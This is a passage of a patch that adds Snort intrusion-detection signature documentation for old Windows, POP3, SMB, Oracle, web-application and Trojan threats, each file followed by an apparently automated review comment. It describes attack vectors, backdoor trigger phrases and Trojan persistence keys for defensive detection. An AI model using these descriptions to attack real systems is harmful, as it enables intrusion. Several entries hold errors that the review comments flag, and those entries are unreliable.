+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3421.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3421
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
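Review bot: this file is word-for-word the same as 3301.txt, including the "Expoit" typo and the Attack Scenarios paragraph that does not match the Detailed Information; if SIDs 3301 and 3421 match different traffic, the Summary should say what distinguishes them, and the fixes should be applied in both files. Additional References is empty.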
--- /dev/null
+++ b/doc/signatures/2456.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2456
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running attempts to send a file to another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.  This may also provide a less scrutinized means of sharing unauthorized or inappropriate files with others. 
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
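Review bot: "such as as virus" in Detailed Information has a doubled "as". False Negatives notes that Yahoo IM may use ports other than the default ones; Corrective Action could mention monitoring or blocking those as well as enforcing policy. The Contributors section lacks the blank line before "--", and the Additional References entry lacks the blank line after the heading used in the other files.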
--- /dev/null
+++ b/doc/signatures/2109.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in the Post Office Protocol (POP) command TOP.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by sending a line feed character to a POP server via the TOP command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
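Review bot: The Sid field is empty ("Sid:" followed by a blank line) even though the file is named 2109.txt; fill in 2109 so the documentation can be matched to the rule. Attack Scenarios reads "Simple.", which is the Ease of Attack answer pasted into the wrong section, and there is no Affected Systems section at all, so a reader cannot tell which POP servers mishandle a line feed in the TOP command.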
--- /dev/null
+++ b/doc/signatures/1866.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+1866
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer by supplying a very long username to a POP3 service.
+
+--
+Impact:
+Serious. Several POP3 servers are vulnerable to USER buffer overflows.
+
+--
+Detailed Information:
+A very long string data in place of the username can lead to a buffer overflow situation.
+
+A buffer overflow attack can be used to execute arbitrary code (remote shell). A Denial of Service (DoS) is also possible.
+ 
+Check your POP3 service for this vulnerability with common vulnerability scanners.
+
+--
+Affected Systems:
+Ipswich IMail 5.0.5, 5.0.6 and 5.0.7 for Windows NT.
+Other POP3 mail systems may be affected.
+
+--
+Attack Scenarios:
+A attacker may first check the POP3 daemon version and try a buffer overflow attack using a long username string supplied with the USER command.
+
+This may result in full compromise of the host. A Remote shell can be bound to a port after the attack. 
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check for other events generated by the source IP address.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
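Review bot: Two grammar slips in this file: "A very long string data in place of the username" should be "A very long string in place of the username", and "A attacker may first check" should be "An attacker may first check". Additional References is empty even though Affected Systems names specific IMail 5.0.x versions, so a vendor advisory or vulnerability database entry should be cited; the separator before Additional References also carries trailing whitespace ("-- ").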
--- /dev/null
+++ b/doc/signatures/3138.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3138
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
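Review bot: The Corrective Action "Use Samba as an alternative" does not mitigate the flaw this file describes: Detailed Information and Attack Scenarios both say the vulnerable code runs on the client when it receives a malicious server response, so replacing the server software leaves the Windows clients just as exposed. Either drop that line or restate it as client-side advice (apply the patches; do not connect to untrusted SMB servers). Minor: "client - server protocol" should be "client-server protocol", and Additional References should cite the vendor bulletin alongside the eEye advisory.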
--- /dev/null
+++ b/doc/signatures/1493.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1493
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+Access to the newuser directory on a host running RBS ISP may indicate
+that an attempt to exploit a well known directory traversal
+vulnerability is being made by appending a ../ to the image variable.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+--
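Review bot: The Affected Systems entry "All systems using a web server" is far broader than what the rule detects; Detailed Information says the event fires on access to the newuser directory of RBS ISP with "../" appended to the image variable, so the affected product should be RBS ISP, and Additional References, currently empty, should cite the advisory for that directory traversal. Also "the attackers choosing" should be "the attacker's choosing".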
--- /dev/null
+++ b/doc/signatures/213.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+213
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "wh00t!".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
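Review bot: The line "This Trojan affects Linux operating systems:" ends in a colon but nothing follows it, and the file has no Affected Systems section, so the list that colon introduces appears to have been lost; restore it or end the sentence with a period. Also "when  an attacker" has a double space, the SSH line under Corrective Action lacks a period, and Additional References is empty.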
--- /dev/null
+++ b/doc/signatures/119-15.txt
@@ -0,0 +1,79 @@
+Rule: 
+
+--
+Sid: 
+119-15
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects a
+request for a URL that is longer than a specified length. This may
+indicate an attack or an attempt to evade an IDS.
+
+Lotus Domino Server Web servers are reported prone to a Denial of
+Service condition when a long request is made to the server using
+unicode characters. The http_inspect pre-processor will generate this
+event should a Domino server be attacked in this way.
+
+Specifically, when a request is made to /cgi-bin/ with approximately 330
+unicode characters appended to the URL, the webserver will crash and a
+DoS condition will be evident.
+
+The maximum expected length of the URL is user configured.
+
+--
+Affected Systems:
+	All web servers
+	Lotus Domino 6.5.1 and 6.0.3
+
+--
+Attack Scenarios: 
+An attacker may supply an over-long URI in an attempt to evade an IDS or
+in a possible attack against a web server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+iDefense:
+http://www.idefense.com/application/poi/display?id=224&type=vulnerabilities
+
+--
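Review bot: There is a stray blank line between the "-- " separator and "Corrective Action:", which breaks the section layout every other file in this patch follows. Detailed Information says "The maximum expected length of the URL is user configured" but never names the http_inspect option that sets it; adding that would let a reader tune the threshold. Capitalize "Unicode", hyphenate "user-configured", and note that Affected Systems lists "All web servers" while the rest of the text is specific to Lotus Domino 6.5.1 and 6.0.3.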
--- /dev/null
+++ b/doc/signatures/2362.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2362
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application YaBB SE.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+YaBB SE contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the location of the
+script packer.php parameter when making a GET or POST  request 
+to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	YaBB SE YaBB SE 0.8
+	YaBB SE YaBB SE 1.4.1
+	YaBB SE YaBB SE 1.5 .0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and supply their
+own code in the packer.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
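Review bot: Ease of Attack is self-contradictory ("No exploit software required. Exploit code exists."); pick one. Affected Systems repeats the vendor name in each line ("YaBB SE YaBB SE 0.8") and "1.5 .0" has a stray space, so the entries should read "YaBB SE 0.8", "YaBB SE 1.4.1" and "YaBB SE 1.5.0". "GET or POST  request" has a double space, and Additional References is empty although Detailed Information names the vulnerable script, packer.php.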
--- /dev/null
+++ b/doc/signatures/1264.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1264
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) bootparam is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port bootparam is using.  Attackers can also learn what versions of the bootparam protocol are accepted by bootparam.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as bootparam run.  The bootparam RPC service is used by some diskless workstations to discover information from a server required to boot.  The client will issue a bootparam whoami request to the server.  The server response will include the Network Information Systems (NIS) domain name.  An attacker can send a bootparam request if no authentication is used. The domain name provides valuable information that can be used to break into an NIS environment.  
+
+--
+Affected Systems:
+Any host running bootparam with no authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where bootparam runs.  This may be a precursor to accessing bootparam.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access bootparam, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for bootparam, not probes of the bootparam service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the bootparam service itself. An attacker may attempt to go directly to the bootparam port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0647
+
+Arachnids 
+http://www.whitehats.com/info/IDS16
+
+
+--
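Review bot: In False Negatives the comma is misplaced: "without querying the portmapper service which, would not trigger the rule" should be "without querying the portmapper service, which would not trigger the rule". Under Corrective Action, "ensure access is denied to RPC-enabled machines" reads as if the machines themselves are being denied; "ensure external access to RPC services is denied" says what is meant.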
--- /dev/null
+++ b/doc/signatures/1898.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1898
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
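Review bot: The "--" separator is missing between "Authentication is not required to cause the overflow." and "Affected Systems:", so the two sections run together. "Sid: 1898" is on one line whereas the other files put the number on the following line; "compromize" should be "compromise"; "kerberos" should be capitalized; and Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack instead of describing how the malformed length value in the administration request reaches the daemon.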
--- /dev/null
+++ b/doc/signatures/477.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+
+Sid:
+477
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP source quench
+datagram.
+
+--
+
+Impact:
+ICMP source quench message are generated by gateway devices that no longer
+have the buffer space needed to queue datagrams for output to the next route.
+This could be an indication of a routing problem, network capacity problem, 
+or on going Denial of Service attack.
+
+--
+
+Detailed Information:
+ICMP source quench messasges are generated when a gateway device runs out
+of buffer space to process incoming network traffic.  This is an informational
+message that is generated in an attempt to inform the remote host generating
+the traffic to limit the speed at which it is sending network traffic to
+the remote host.
+
+--
+
+Attack Scenarios:
+Denial of Service.  Attackers could potenially use ICMP source quench datagrams
+to rate limit a remote host that listens to unsolicited ICMP source quench 
+datagrams.   
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of datagram.
+
+--
+
+False Positives:
+Legitimate source quench datagrams will trigger this rule.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to block incoming ICMP source quench datagrams.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS238
+
+
+--
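Review bot: Several typos in this file: "ICMP source quench message are generated" should be "messages are generated", "messasges" should be "messages", "potenially" should be "potentially", and "on going" should be "ongoing". False Negatives is also missing the blank line before its "--" separator. Since False Positives admits that legitimate source quench datagrams trigger the rule, Corrective Action should say that blocking them at ingress removes the legitimate rate-limiting signal along with the attack.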
--- /dev/null
+++ b/doc/signatures/2652.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2652
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_og.begin_load" procedure is used for
+offline instantiation of master groups.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
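Review bot: "a Oracle database implementation" should be "an Oracle database implementation". The Affected Systems entry is indented with spaces while the other files in this patch use a tab. The note about setting $ORACLE_PORTS to "any" on Windows is sensor configuration advice rather than a description of the vulnerability, so it belongs under Corrective Action or in a note of its own. Attack Scenarios says a valid username and password are required; repeat that in Ease of Attack, since "Simple." on its own overstates the exposure.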
--- /dev/null
+++ b/doc/signatures/517.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+517
+
+--
+Summary:
+This event is generated when an attempt is made to query the XDMCP 
+service.
+
+--
+Impact:
+Serious. Information disclosure. Unauthorized access to the system.
+
+--
+Detailed Information:
+An XDMCP query can provide a wealth of information about a host such as 
+a login screen, a list of users on the host, and to bypass access 
+control restrictions used by tcpwrapper and to bypass the restriction of
+login by user "root" on the box.
+
+--
+Affected Systems:
+	Any UNIX based server running XDMCP.
+
+--
+Attack Scenarios:
+An attacker can use this to find out information about the machine and 
+then either launch a specific attack or connect to the X windows server 
+using XDMCP.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable XDMCP if not needed.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS476
+
+--
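Review bot: The first sentence of Detailed Information mixes nouns and verb phrases and does not parse: "a wealth of information about a host such as a login screen, a list of users on the host, and to bypass access control restrictions". Split it into what the query reveals (a login screen, a list of users) and what it lets an attacker bypass (tcpwrapper access controls and the restriction on root logins). "X windows server" should be "X Window server".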
--- /dev/null
+++ b/doc/signatures/703.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+703
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
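Review bot: Affected Systems and Additional References are both empty, and the Summary promises "a known vulnerability in Microsoft SQL" while Detailed Information only describes generic unauthorized access, so the reader never learns which vulnerability the rule covers; name the affected versions and cite the advisory, or reword the Summary. "Microsoft SQL" should read "Microsoft SQL Server".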
--- /dev/null
+++ b/doc/signatures/162.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+162
+
+--
+Summary:
+Matrix is a Trojan Horse offering the attacker the ability to upload 
+files to, and download files from the victim host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Matrix server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+Matrix is based on the Girlfriend Trojan, see sid 145.
+
+The default name of the server application is Wincfg.exe
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added 
+
+Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe"
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS83
+
+--
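Review bot: Under Corrective Action the entry labelled "Registry keys added" is a value, not a key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ is the key and Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe" is the value written under it, so the heading should read "Registry value added:" with a colon. Also "The default name of the server application is Wincfg.exe" lacks a period, and "Registry keys added " has trailing whitespace.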
--- /dev/null
+++ b/doc/signatures/111-9.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-9
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a NULL scan is in progress. That is, packets without any flags set have
+been detected. This should not occur in normal TCP data transmissions.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
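Review bot: Corrective Action ("Check the target host for signs of compromise" and apply patches) does not fit what this event is: Detailed Information describes a NULL scan, which is reconnaissance rather than an exploit, so the advice should be about the scan itself (record the source, confirm that the perimeter drops packets with no TCP flags set) rather than patching. Additional References is empty.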
--- /dev/null
+++ b/doc/signatures/2130.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2130
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a host running Microsoft Internet Information Server (IIS) using the IISProtect web administration interface. 
+
+--
+Impact:
+Administrator access and arbitrary command execution.
+
+--
+Detailed Information:
